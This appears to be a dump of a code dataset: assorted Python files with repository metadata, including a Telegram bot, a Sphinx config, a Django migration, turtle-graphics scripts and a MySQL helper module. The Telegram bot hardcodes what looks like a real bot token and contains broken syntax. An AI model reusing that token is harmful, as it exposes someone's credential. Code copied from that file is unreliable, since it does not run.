def HostInternetScsiHbaAuthenticationCapabilities(vim, *args, **kwargs):
'''The authentication capabilities for this host bus adapter.'''
obj = vim.client.factory.create('{urn:vim25}HostInternetScsiHbaAuthenticationCapabilities')
# do some validation checking...
if (len(args) + len(kwargs)) < 4:
raise IndexError('Expected at least 5 arguments got: %d' % len(args))
required = [ 'chapAuthSettable', 'krb5AuthSettable', 'spkmAuthSettable', 'srpAuthSettable' ]
optional = [ 'mutualChapSettable', 'targetChapSettable', 'targetMutualChapSettable',
'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| [
"jmb@pexip.com"
] | jmb@pexip.com |
5ae62e7a2aebbe4228d9013bd093f34148deefa5 | d57b51ec207002e333b8655a8f5832ed143aa28c | /.history/nanachi_20200619190147.py | 86f02fde6c3e6677051477be28e1a4ea19c0aee3 | [] | no_license | yevheniir/python_course_2020 | b42766c4278a08b8b79fec77e036a1b987accf51 | a152d400ab4f45d9d98d8ad8b2560d6f0b408c0b | refs/heads/master | 2022-11-15T07:13:24.193173 | 2020-07-11T15:43:26 | 2020-07-11T15:43:26 | 278,890,802 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import telebot
bot = telebot.TeleBot('776550937:AAELEr0c3H6dM-9QnlDD-0Q0Fcd65pPyAiM')
@bot.message_handler(content_types=['text'])
def send_text(message):
if message.text[0].lower() == "н" and :
bot.send_message(message.chat.id, message.text + message.text[1:] )
bot.polling()
def c | [
"yevheniira@intelink-ua.com"
] | yevheniira@intelink-ua.com |
f6ce243146b5a953f28c66da59306e9142735527 | bad0f9497e549d729d342f84d7fae197cccdd198 | /docs/source/conf.py | 77b14d6ed6f15026ed9dce76aebf1bae589ece6e | [
"BSD-3-Clause"
] | permissive | talpor/django-activity-stream | 2f900dc95561d9bdaf23934463524c68bae567de | 8348bec4ee80be2cc19aa17932ecaf81f6df9def | refs/heads/master | 2021-01-15T23:02:45.341247 | 2018-05-17T18:50:50 | 2018-05-17T18:50:50 | 32,185,029 | 0 | 0 | null | 2015-03-13T22:55:08 | 2015-03-13T22:55:06 | Python | UTF-8 | Python | false | false | 5,763 | py | # -*- coding: utf-8 -*-
#
# Django Activity Stream documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 1 12:35:29 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
from datetime import datetime
os.environ['DJANGO_SETTINGS_MODULE'] = 'actstream.runtests.settings'
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../actstream/runtests'))
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../..'))
import django
try:
django.setup()
except AttributeError:
pass
import actstream
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Activity Stream'
copyright = u'2010-%s, Justin Quick. Activity Streams logo released under ' \
u'<a href="http://creativecommons.org/licenses/by/3.0/">Creative Commons 3.0</a>' % datetime.now().year
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = actstream.get_version(False)
# The full version, including alpha/beta/rc tags.
release = actstream.get_version()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'tango'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import alabaster
extensions.append('alabaster')
html_theme_path = [alabaster.get_path()]
html_theme = 'alabaster'
html_sidebars = {
'**': [
'about.html', 'navigation.html', 'searchbox.html', 'donate.html',
]
}
html_static_path = ['_static']
html_theme_options = {
'logo': 'logo.jpg',
'logo_text_align': 'center',
'description': 'Generic activity streams for Django',
'github_user': 'justquick',
'github_repo': 'django-activity-stream',
'travis_button': True,
'gittip_user': 'justquick',
'analytics_id': 'UA-42089198-1'
}
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoActivityStreamdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoActivityStream.tex', u'Django Activity Stream Documentation',
u'Justin Quick', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangoactivitystream', u'Django Activity Stream Documentation',
[u'Justin Quick'], 1)
]
| [
"justquick@gmail.com"
] | justquick@gmail.com |
5ece19536166f0b866ad549915f7002b119a6b49 | 1b3e62ac5655fbcbb7cf95724354c8e69d487745 | /HSE WEEK 5/HSE 5 Task 31.py | c9619f61ea9d0944c84c7a376de659ef19fa3cc9 | [] | no_license | syth0le/HSE.Python | 7d97f38e9b57825b54ac2576b00731240eef227c | e9a15b1ed5e21d56281e4619a39198d5d2838f0b | refs/heads/master | 2021-01-14T17:35:30.427970 | 2020-03-24T17:23:30 | 2020-03-24T17:23:30 | 242,698,160 | 5 | 1 | null | 2020-03-23T19:41:20 | 2020-02-24T09:43:15 | Python | UTF-8 | Python | false | false | 167 | py | numList = input().split()
for i in range(0, len(numList), 2):
numList[i:i+2] = numList[i:i+2][::-1]
readylist = list(map(str, numList))
print(' '.join(readylist))
| [
"chdan565@gamil.com"
] | chdan565@gamil.com |
7180394060ae55aeb4c339d0562f330eaaf40bca | 56bf6c68e78257e887de9e5eae11fc6652ce7f06 | /bbdd/Scripts/bbdd/productos/migrations/0002_auto_20170313_1111.py | 971ae6caf6b0803bf878e97cde5caee4a2089a6a | [] | no_license | CarlosSanz81/bbdd | 1d1c670e16f0e8ee81fb929767d8f65b7361cbe3 | 3b1febaddfef93fffeb34c3970281e4a37d05146 | refs/heads/master | 2023-01-09T03:20:02.042514 | 2017-03-13T11:07:15 | 2017-03-13T11:07:15 | 84,815,195 | 0 | 1 | null | 2022-12-20T09:00:14 | 2017-03-13T10:45:00 | Python | UTF-8 | Python | false | false | 3,508 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 10:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the `producto` model.

    Renames four client-related fields, removes four fields, adds
    address/contact/order columns, and narrows `isbn` to 13 digits.
    Do not edit the operations by hand unless the migration has not
    been applied anywhere yet.
    """
    # Must be applied on top of the app's initial migration.
    dependencies = [
        ('productos', '0001_initial'),
    ]
    operations = [
        # --- Renames: repurpose existing client columns ---
        migrations.RenameField(
            model_name='producto',
            old_name='descripcion_cliente',
            new_name='apellido1',
        ),
        migrations.RenameField(
            model_name='producto',
            old_name='nombre_cliente',
            new_name='apellido2',
        ),
        migrations.RenameField(
            model_name='producto',
            old_name='presupuesto',
            new_name='codigoImprenta',
        ),
        migrations.RenameField(
            model_name='producto',
            old_name='numero_cliente',
            new_name='cp',
        ),
        # --- Removals ---
        migrations.RemoveField(
            model_name='producto',
            name='fijo',
        ),
        migrations.RemoveField(
            model_name='producto',
            name='image',
        ),
        migrations.RemoveField(
            model_name='producto',
            name='margen',
        ),
        migrations.RemoveField(
            model_name='producto',
            name='numero_parte',
        ),
        # --- Additions ---
        # NOTE(review): default=0 on CharField columns stores the integer 0
        # as the one-off default; '' was probably intended — confirm before
        # reuse.  preserve_default=False means the default is only used to
        # back-fill existing rows.
        migrations.AddField(
            model_name='producto',
            name='direcc',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='fecha',
            field=models.DateTimeField(auto_now=True),
        ),
        migrations.AddField(
            model_name='producto',
            name='movil',
            field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='nombre',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='nombreCompleto',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='pedido',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='poblacion',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='provincia',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='remesa',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='telefono',
            field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
            preserve_default=False,
        ),
        # --- Alteration: cap isbn at 13 digits, no decimals ---
        migrations.AlterField(
            model_name='producto',
            name='isbn',
            field=models.DecimalField(decimal_places=0, max_digits=13),
        ),
    ]
| [
"carlossanzgarcia81@gmail.com"
] | carlossanzgarcia81@gmail.com |
62c94db115f11585424e8df49b2baf70d5c8bc4d | 9a486a87e028303a551fbd0d1e1b6b650387ea14 | /propose/anim/me_send/human_skin.py | 23974e36ca1961c8edd87e9707c50518b46b0440 | [] | no_license | shanlihou/pythonFunc | 7b8e7064fddd4522e492c915c086cc6c5abc6eec | 646920256551ccd8335446dd4fe11aa4b9916f64 | refs/heads/master | 2022-08-24T20:33:12.287464 | 2022-07-21T12:00:10 | 2022-07-21T12:00:10 | 24,311,639 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py |
skin = [
('head', (174, 229), 'me.png', True, True, 0.2),
('upper_arm1', (11, 56), 'all.png', True, True, 0.2),
('lower_arm1', (11, 59), 'all.png', True, True, 0.2),
('upper_arm2', (9, 60), 'all.png', True, True, 0.2),
('lower_arm2', (8, 60), 'all.png', True, True, 0.2),
('upper_leg1', (11, 58), 'all.png', True, True, 0.2),
('lower_leg1', (9, 63), 'all.png', True, True, 0.2),
('upper_leg2', (11, 57), 'all.png', True, True, 0.2),
('lower_leg2', (11, 59), 'all.png', True, True, 0.2),
('body', (24, 124), 'all.png', True, True, 0.5),
('cell_phone', (24, 124), 'cellphone.png', True, True, 0.5),
]
| [
"shanlihou@gmail.com"
] | shanlihou@gmail.com |
a99808919eadfeaef81265b7cda8db9b9fd19fe4 | b834509b4d3bf3b9161c3ac9ea2984af17bebf5e | /icvUI/dbsession/panel.py | de24cb4c4d427413ea39deb950f953065b7ee523 | [] | no_license | RichardZhong/meiduo | a338dc6b78da71df60ebff7827c5ba6225081650 | 4d530b4870d3353daaf4b1505998156595055073 | refs/heads/master | 2020-08-22T12:12:07.870793 | 2018-09-26T03:26:49 | 2018-09-26T03:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,861 | py | from icvUI.dbsession import *
# Fetch every camera that is enabled for the "panel" application.
def query_panel_camera():
    """Return camera_id/description/ori_data rows for all panel cameras.

    Rows are dicts (dictionary cursor) ordered by camera id; returns
    ``None`` when the database query fails.
    """
    try:
        connection = mc.connect(**fs_icv_db)
        cur = connection.cursor(dictionary=True)
        sql = "SELECT panel_ori.camera_id,description,ori_data FROM camera,panel_ori WHERE FIND_IN_SET('panel',application) AND panel_ori.camera_id = camera.camera_id ORDER BY panel_ori.camera_id;"
        cur.execute(sql)
        rows = cur.fetchall()
        return rows
    except Exception as err:
        print(err)
        return None
    finally:
        cur.close()
        connection.close()
def query_panel_label():
    """Return all ``label_zh`` rows from panel_label, or None on error."""
    try:
        connection = mc.connect(**fs_icv_db)
        cur = connection.cursor(dictionary=True)
        cur.execute("SELECT label_zh FROM panel_label;")
        return cur.fetchall()
    except Exception as err:
        print(err)
        return None
    finally:
        cur.close()
        connection.close()
# Fetch the stored first-frame snapshot of one panel camera.
def query_panel_first_frame(camera_id):
    """Return the panel_first_frame row for *camera_id* as a dict.

    Args:
        camera_id: identifier of the camera to look up.

    Returns:
        A dict with ``camera_id`` and ``frame_img``, ``None`` when no
        row matches or the query fails.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        # Bug fix: the original embedded a literal '{camera_id}' that was
        # never interpolated (no .format call), so the lookup could never
        # match.  A parameterized query fixes that and avoids injection.
        query_sql = "SELECT camera_id, frame_img FROM panel_first_frame WHERE camera_id = %s;"
        cursor.execute(query_sql, (camera_id,))
        return cursor.fetchone()
    except Exception as e:
        print(e)
        return None
    finally:
        # Guarded: the original raised NameError here when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Store new panel ROI/annotation data for one camera.
def update_panel_data(camera_id, ori_data):
    """Overwrite ``panel_ori.ori_data`` for *camera_id*.

    Returns:
        'ok' on success, 'wrong' on any failure.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        # Security fix: the original built the SQL with str.format, so a
        # quote or backslash inside ori_data broke the statement (and
        # allowed injection).  Use driver-side parameters instead.
        update_sql = "UPDATE panel_ori SET ori_data = %s WHERE camera_id = %s;"
        cursor.execute(update_sql, (ori_data, camera_id))
        conn.commit()
        return 'ok'
    except Exception as e:
        print(e)
        return 'wrong'
    finally:
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Fetch the most recent panel inspection result for one camera.
def query_latest_panel(camera_id):
    """Return the newest panel_result row (joined with camera) as a dict.

    Args:
        camera_id: identifier of the camera to look up.

    Returns:
        The row dict with ``alarm_type`` flattened to a comma-separated
        string, or ``None`` when no row exists or the query fails.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        # Bug fix: the original embedded a literal '{camera_id}' that was
        # never interpolated, so no row ever matched.  With parameters the
        # '%' characters inside DATE_FORMAT must be doubled so the driver
        # does not treat them as placeholders.
        query_sql = (
            "SELECT description,panel_result.camera_id,status_type,alarm_data,"
            "panel_picture,DATE_FORMAT(time,'%%Y-%%m-%%d %%T') AS time,alarm_type "
            "FROM camera,panel_result "
            "WHERE panel_result.camera_id = %s "
            "AND camera.camera_id = panel_result.camera_id "
            "ORDER BY time DESC LIMIT 0,1;"
        )
        cursor.execute(query_sql, (camera_id,))
        data = cursor.fetchone()
        if not data:
            return None
        # Flatten alarm_type by joining its elements with commas, exactly
        # as the original did (it iterated the value element by element).
        data['alarm_type'] = ",".join(list(data['alarm_type']))
        return data
    except Exception as e:
        print(e)
        return None
    finally:
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Fetch the full panel inspection history, optionally filtered by status.
def query_panel_history(offset, limit, search):
    """Return one page of panel results plus the total matching count.

    Args:
        offset: index of the first row of the requested page.
        limit:  page size.
        search: "正常" or "异常" to filter by status_type; any other
                value returns all rows.

    Returns:
        ``{'total': <row count>, 'rows': <page of dict rows>}`` or
        ``None`` when the query fails.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        # The three original queries differed only in the status filter,
        # so build the clause once.  `search` is checked against a fixed
        # whitelist before interpolation, so this cannot inject SQL.
        status_filter = ""
        if search in ("正常", "异常"):
            status_filter = " AND panel_result.status_type = '{}'".format(search)
        query_sql = (
            "SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,"
            "description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time "
            "FROM camera,panel_result "
            "WHERE panel_result.camera_id = camera.camera_id"
            + status_filter +
            " ORDER BY time DESC;"
        )
        cursor.execute(query_sql)
        data = cursor.fetchall()
        # Pagination happens client-side, as in the original implementation.
        returndata = data[offset:offset + limit]
        # Flatten alarm_type into a comma-separated string (same as original).
        for single in returndata:
            single['alarm_type'] = ",".join(list(single['alarm_type']))
        return {
            'total': len(data),
            'rows': returndata
        }
    except Exception as e:
        print(e)
        return None
    finally:
        # Guarded: the original raised NameError here when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Set the routine snapshot interval for panel cameras.
def update_panel_interval(interval):
    """Insert or update the single ``panel_daily_time`` row.

    Bug fix: the original INSERT/UPDATE statements contained a literal
    '{interval}' that was never interpolated, so the stored value was
    always the text "{interval}".  Parameterized queries fix that and
    prevent injection.

    Returns:
        'ok' on success, 'wrong' on any failure.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        cursor.execute("SELECT * FROM panel_daily_time;")
        data = cursor.fetchall()
        if len(data) == 0:
            # First-time configuration: create the row.
            cursor.execute(
                "INSERT INTO panel_daily_time(time_interval) VALUES(%s);",
                (interval,))
        else:
            # Row exists: overwrite the interval.
            cursor.execute(
                "UPDATE panel_daily_time SET time_interval = %s;",
                (interval,))
        conn.commit()
        return 'ok'
    except Exception as e:
        print(e)
        return 'wrong'
    finally:
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Query the routine snapshot interval configured for panel cameras.
def query_panel_interval():
    """Return the panel_daily_time rows with ``time_interval`` mapped from
    a minute count to a display label, '' when no row exists, or ``None``
    when the query fails."""
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary = True)
        query_sql = "SELECT * FROM panel_daily_time;"
        cursor.execute(query_sql)
        data = cursor.fetchall()
        if len(data) == 0:
            # No interval configured yet: callers receive an empty string.
            data = ''
        else:
            # Map stored minutes to a human-readable label (Chinese:
            # "10分钟" = 10 minutes, "1小时" = 1 hour, ...).
            time_hash = {
                "10":"10分钟",
                "30":"30分钟",
                "60":"1小时",
                "120":"2小时",
                "180":"3小时"
            }
            # NOTE(review): raises KeyError for any value outside the map.
            data[0]['time_interval'] = time_hash[data[0]['time_interval']]
        return data
    except Exception as e:
        print(e)
        return None
    finally:
        cursor.close()
        conn.close() | [
"xwp_fullstack@163.com"
] | xwp_fullstack@163.com |
a7c4f424709c906decef7ac3409403229846dd1c | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Programming_basics/Exercise_7/AgencyProfit.py | a3938967800366d45453b1a08b8b42eed96dad4e | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | name = input()
# Read booking inputs from stdin, one value per line.
elder_tickets = int(input())
child_tickets = int(input())
elder_ticket_price = float(input())
fee = float(input())
# Final per-ticket prices: children pay 30% of the adult base price;
# the fixed fee is added to every ticket.
elder_fin_price = elder_ticket_price + fee
child_fin_price = elder_ticket_price * 0.3 + fee
total = elder_tickets * elder_fin_price + child_tickets * child_fin_price
# The agency keeps 20% of total ticket revenue as profit.
profit = total * 0.2
# NOTE(review): `name` is read by a `name = input()` line that lies just
# before this fragment.
print(f'The profit of your agency from {name} tickets is {profit:.2f} lv.')
| [
"vbukovska@yahoo.com"
] | vbukovska@yahoo.com |
1986344b43c648c00039b97711e2dc0504351d08 | 15e4ea46e2b1944add82746c4b3369184550af1b | /4 Turtles/Exercises/12.py | d1f03e57e3a9db7631b7632e03de692aced0d777 | [] | no_license | eduardogomezvidela/Summer-Intro | 53204a61b05066d8b8bc1ef234e83e15f823934d | 649a85b71a7e76eade3665554b03ca65108c648b | refs/heads/master | 2021-04-29T13:34:26.873513 | 2018-02-16T13:35:48 | 2018-02-16T13:35:48 | 121,754,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | import turtle
# Create a turtle object and print its type (<class 'turtle.Turtle'>).
alex=turtle.Turtle()
print(type(alex))
| [
"eduardogomezvidela@gmail.com"
] | eduardogomezvidela@gmail.com |
74707c9d2c81498ed5fdb4c8f86098f7a2885d48 | a31de016611f3b4efc7a576e7113cad1a738419b | /2017/turtle_grafik/101computing.net/turtle_clock.py | 807e976a1aea285185ccdd4507415e444013ccf9 | [] | no_license | Ing-Josef-Klotzner/python | 9d4044d632672fff966b28ab80e1ef77763c78f5 | 3913729d7d6e1b7ac72b46db7b06ca0c58c8a608 | refs/heads/master | 2022-12-09T01:40:52.275592 | 2022-12-01T22:46:43 | 2022-12-01T22:46:43 | 189,040,355 | 0 | 0 | null | 2022-12-01T19:52:37 | 2019-05-28T14:05:16 | Python | UTF-8 | Python | false | false | 2,072 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
"""
Created on Mon Sep 25 23:16:54 2017

@author: josef
"""
# Analog clock drawn with turtle graphics: the dial (circle plus tick
# marks) is drawn once, then the hour/minute/second hands are redrawn
# about once per second in an endless loop.
import turtle, datetime, time
myPen = turtle.Turtle()
myPen.shape("arrow")
myPen.tracer(0)  # disable auto-animation; the screen is updated manually
myPen.speed(0)
myPen.shapesize(.5,1)
turtle.delay(0)
# Draw the dial: a blue circle of radius 180 around the origin.
myPen.penup()
myPen.goto(0,-180)
myPen.pendown()
myPen.pensize(3)
myPen.color("blue")
myPen.circle(180)
for wi in range(6,361,6): # 360/60 = 6 degrees per step -- second tick marks
    myPen.penup()
    myPen.goto(0,0)
    myPen.setheading(wi)
    myPen.fd(160)
    myPen.pendown()
    myPen.fd(10)
myPen.pensize(6)
for wi in range(30,361,30): # 360/12 = 30 degrees per step -- minute/hour marks
    myPen.penup() # marks at 3, 6, 9 and 12 o'clock are drawn longer
    myPen.goto(0,0)
    myPen.setheading(wi)
    if wi % 90 == 0:
        myPen.fd(155)
        myPen.down()
        myPen.fd(15)
    else:
        myPen.fd(160)
        myPen.pendown()
        myPen.fd(10)
myPen.pensize(3)
while True:
    # Hour hand (red, length 100): 30 degrees per hour plus the
    # fractional advance contributed by minutes and seconds.
    myPen.color("red")
    currentSecond = datetime.datetime.now().second
    currentMinute = datetime.datetime.now().minute
    currentHour = datetime.datetime.now().hour
    myPen.penup()
    myPen.goto(0,0)
    myPen.setheading(90) # Point to the top - 12 o'clock
    myPen.right(currentHour*360/12+currentMinute*360/12/60+currentSecond*360/12/60/60)
    myPen.pendown()
    myPen.pensize(7)
    myPen.forward(100)
    myPen.stamp()
    # Minute hand (red, length 130): 6 degrees per minute plus the
    # fractional advance contributed by seconds.
    myPen.penup()
    myPen.goto(0,0)
    myPen.setheading(90) # Point to the top - 0 minute
    myPen.right(currentMinute*360/60+currentSecond*360/60/60)
    myPen.pendown()
    myPen.pensize(5)
    myPen.forward(130)
    myPen.stamp()
    # Second hand (green, length 140) with a dot at the centre.
    myPen.color("green")
    myPen.penup()
    myPen.goto(0,0)
    myPen.pensize(7)
    myPen.dot()
    myPen.pensize(3)
    myPen.setheading(90) # Point to the top - 0 seconds
    myPen.right(currentSecond*360/60)
    myPen.pendown()
    myPen.forward(140)
    myPen.getscreen().update()
    time.sleep(.99)
    # Undo the hand strokes (20 drawing actions) before the next frame.
    for _ in range(20):
        myPen.undo()
#    myPen.getscreen().update()
#turtle.done()
| [
"josef.klotzner@gmail.com"
] | josef.klotzner@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.